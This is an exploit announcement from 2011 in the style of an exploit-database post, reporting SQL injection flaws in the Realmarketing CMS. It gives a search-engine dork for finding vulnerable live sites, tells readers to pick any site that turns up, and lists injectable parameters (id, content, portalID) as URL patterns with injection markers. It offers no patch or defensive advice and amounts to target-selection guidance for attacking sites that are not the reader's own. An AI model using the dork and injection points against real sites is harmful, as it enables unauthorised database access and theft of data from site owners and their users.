#(+)Exploit Title: Realmarketing CMS System Sensitive Database Disclosure Vulnerability #(+)Author : ^Xecuti0n3r #(+) Date : 22.04.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecuti0n3r()yahoo.com #(+) dork : intext:realweb.de inurl:default.php #(+) Category : Web Apps [SQli] ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext:"intext:realweb.de inurl:default.php" in search engine *SQL injection Vulnerability* # [+]http://site.com/default.php?id='125 # [+]http://site.com/default.php?id=[SQLI] # [+]http://site.com/default.php?content='2485 # [+]http://site.com/default.php?content=[SQLI] # [+]http://site.com/default.php?portalID='68 # [+]http://site.com/default.php?portalID=[SQLI] # [+]http://site.com/default.php?&id='121 # [+]http://site.com/default.php?&id=[SQLI] ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0n3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r ########################################################################